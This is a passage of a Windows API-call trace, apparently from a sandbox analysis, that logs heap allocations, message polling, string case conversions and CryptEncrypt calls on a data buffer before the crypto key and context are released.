[0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c1700 | out: hHeap=0x25c0000) returned 1 [0254.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.499] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xf4a4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xf4a8) returned 1 [0254.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.500] CharLowerBuffW (in: lpsz="byte[62632]", cchLength=0xb | out: lpsz="byte[62632]") returned 0xb [0254.500] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.502] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.502] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.502] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.502] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.502] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.502] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.503] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c1700*, pdwDataLen=0x8bef68*=0xf4a4, dwBufLen=0xf4a8 | out: pbData=0x34c1700*, pdwDataLen=0x8bef68*=0xf4a8) returned 1 [0254.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.504] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.505] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.505] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.505] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.505] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.505] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.505] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.505] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.505] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.505] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.506] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.506] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.506] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.506] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.506] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.506] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.506] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.511] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.515] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.515] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.515] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0254.515] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.515] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0254.515] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.515] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.515] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.516] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.516] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.516] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.516] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.516] CryptDestroyKey (hKey=0xaa5760) returned 1 [0254.516] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.516] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.516] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.516] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.516] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.516] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.517] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.517] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.517] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.517] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.517] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.517] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.517] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.517] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.517] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.517] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.517] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.518] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.518] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.518] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.518] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.518] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.518] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.519] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.519] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.519] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.519] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.519] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.519] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.519] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.519] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.519] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.519] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.519] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.519] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.520] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.520] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.520] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.520] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.520] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.520] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.520] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.520] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.520] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.520] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.520] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.521] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) 